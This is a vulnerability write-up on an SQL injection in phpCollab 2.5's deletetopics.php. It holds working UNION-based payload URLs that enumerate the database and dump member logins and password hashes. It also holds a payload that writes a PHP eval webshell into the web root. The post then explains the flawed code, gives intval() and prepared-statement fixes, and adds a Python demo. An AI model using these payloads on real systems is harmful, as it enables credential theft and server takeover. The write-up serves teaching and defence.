
[Vulnerability Analysis] PHPCollab 2.5 SQL Injection Vulnerability

2015-05-26 15:24
This vulnerability is catalogued as EDBID:37004 and OSVDB:122102.

From the project's own description:

phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet.

Those organizations, such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab.

Official site: http://www.phpcollab.com/

The vulnerability is in deletetopics.php under the topics directory.

I. Reproducing the Vulnerability

Install the web application. Before testing, add a new project.



Then add a topic under that project.



The injection is triggered when deleting a topic; the project parameter is the injection point:

http://[HOST]/phpcollab/topics/deletetopics.php?project=2&id=2&PHPSESSID=27tujmpv903453tcto9o9jf465




First, append a single quote (%27) to the project parameter: the page returns a database error message, which confirms that the input reaches the query unescaped.

Next, use ORDER BY n with increasing n to find out how many columns the query selects. From the page's responses (an error once n exceeds the real count) there are 22 columns, so a UNION SELECT probe needs exactly 22 values:

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=2



Next, look for a column whose value is echoed back on the page: the value placed in column 6 is displayed.



Putting database(), user() and version() in that column returns the database name, the database user and the MySQL version respectively.







Retrieve the names of all databases (the list lives in the schema_name column of information_schema.schemata):

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.schemata--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




Retrieve the names of all tables in the phpcollab database (0x706870636f6c6c6162 is the hex encoding of the string phpcollab; MySQL accepts it as a string literal, so no quote characters are needed in the payload):

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.tables%20where%20table_schema=0x706870636f6c6c6162--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




Retrieve the column names of the members table (0x6d656d62657273 is the hex form of members):

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




Finally, extract the user names and passwords (0x3a is the ':' separator between the two fields):

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,group_concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20members--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




The same injection can also be used to write a webshell into the web root with INTO OUTFILE. This only works when the MySQL user has the FILE privilege, secure_file_priv does not restrict the target directory, and the absolute path of a writable web directory is known (here a WAMP installation on Windows):

http://[HOST]/phpcollab/topics/deletetopics.php?project=2%27%20union%20select%201,2,3,4,5,%27%3C?php%20@eval($_POST[cmd]);?%3E%27,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20%20into%20outfile%20%27c:/wamp/www/phpcollab/ma2.php%27--%20&PHPSESSID=27tujmpv903453tcto9o9jf465&id=1




Connecting to the webshell with a one-line-shell client succeeds, which shows the file was written and is executed by the web server.



II. Vulnerability Analysis

Lines 27 to 33 of topics/deletetopics.php are where the vulnerability lies:

if($_GET['project']){
$project = $_GET['project'];
} else {
unset($project);
}
$tmpquery = "WHERE pro.id = '$project'";


The program takes the project value straight from the URL, stores it in $project, and on line 32 interpolates it into the SQL string without any sanitization. The surrounding single quotes are the only thing separating the input from the query, and a quote in the input closes them, after which everything that follows is parsed as SQL.

III. Hardening

Cast $project to an integer with intval(), so that the code becomes:

if($_GET['project']){
$project = $_GET['project'];
$project = intval($project);
} else {
unset($project);
}
$tmpquery = "WHERE pro.id = '$project'";


After this change, appending a quote to the project parameter no longer produces an error: intval() keeps only the leading integer of the string, so the rest of the payload never reaches the query. This is adequate here because project is a numeric id; parameters that legitimately contain text cannot be fixed this way and need a prepared statement instead (method 1 below).



IV. Methods of Preventing SQL Injection

1. Use prepared statements (parameterized queries), so that user input is bound as data and never parsed as SQL.

2. Use stored procedures (this only helps when the procedure itself does not build dynamic SQL from its arguments).

3. Check data types, for example by casting numeric parameters as in section III.

4. Use safe encoding functions (OWASP ESAPI).
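The reproduction steps of section I (ORDER BY column counting, locating the echoed column, extracting login:password with group_concat) and the two fixes of sections III and IV (intval() and a prepared statement) can be replayed offline. The following is an added example written for this write-up; it is not phpCollab code and not part of the original post. It assumes an in-memory SQLite database with a constructed 4-column projects table standing in for the real 22-column query, invented members rows, a render() function standing in for the HTML page (which only shows the project name), and a Python re-implementation of PHP's intval() string semantics. SQLite has no 0x3a literal or multi-argument group_concat, so the MySQL expression group_concat(login,0x3a,password) is spelled group_concat(login||':'||password).

```python
"""
Added example: the deletetopics.php injection shape replayed against SQLite,
then the intval() cast and a prepared statement. Not phpCollab code; the
schema and rows below are constructed for the demonstration.
"""
import re
import sqlite3


def make_db():
    """Constructed stand-in schema; only the column names login/password mirror phpCollab."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE projects(id INTEGER PRIMARY KEY, name TEXT, owner INTEGER, status TEXT);
        INSERT INTO projects VALUES (1, 'alpha', 1, 'open'), (2, 'beta', 2, 'closed');
        CREATE TABLE members(id INTEGER PRIMARY KEY, login TEXT, password TEXT);
        INSERT INTO members VALUES (1, 'admin', 'h1'), (2, 'bob', 'h2');
    """)
    return con


def vulnerable_query(con, project):
    """Same construction as deletetopics.php: WHERE pro.id = '$project' with no escaping."""
    sql = ("SELECT pro.id, pro.name, pro.owner, pro.status FROM projects pro "
           f"WHERE pro.id = '{project}'")
    return con.execute(sql).fetchall()


def render(rows):
    """Stand-in for the HTML page: the application only shows the project name (column 2)."""
    return rows[0][1] if rows else ""


def count_columns(con, limit=64):
    """Section I, ORDER BY step: raise n until the database rejects the column index."""
    for n in range(1, limit + 1):
        try:
            vulnerable_query(con, f"2' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_echo_position(con, ncols):
    """Section I, echo step: one marker per column; the rendered marker names the usable column."""
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    # id 0 does not exist, so only the UNION row comes back; the page used id=2 and read the extra row.
    shown = render(vulnerable_query(con, f"0' UNION SELECT {markers} -- "))
    return int(shown[3:]) if shown.startswith("col") else None


def dump_members(con, ncols, pos):
    """Section I, final step: the aggregated login:password pairs in the echoed column."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = "group_concat(login||':'||password)"   # MySQL: group_concat(login,0x3a,password)
    payload = f"0' UNION SELECT {','.join(cols)} FROM members -- "
    return render(vulnerable_query(con, payload))


def intval(value):
    """PHP intval() semantics for strings: the leading integer prefix, otherwise 0.
    intval("2' UNION SELECT ...") is 2, which is why the section III fix stops the error."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def parameterized_query(con, project):
    """Method 1 of section IV: the value is bound as a parameter, so quotes,
    UNION and comment markers are just characters compared against pro.id."""
    sql = "SELECT pro.id, pro.name, pro.owner, pro.status FROM projects pro WHERE pro.id = ?"
    return con.execute(sql, (project,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    ncols = count_columns(con)
    pos = find_echo_position(con, ncols)
    print("columns:", ncols, "echo position:", pos)
    print("vulnerable:", dump_members(con, ncols, pos))
    payload = "0' UNION SELECT 1,2,3,4 -- "
    print("after intval():", vulnerable_query(con, intval(payload)))
    print("prepared statement:", parameterized_query(con, payload))
```

Running the script prints the constructed members table as admin:h1,bob:h2 through the vulnerable path, an empty result for the same payload once intval() reduces it to 0, and an empty result from the prepared statement, where the whole payload string is compared as a value and matches no id.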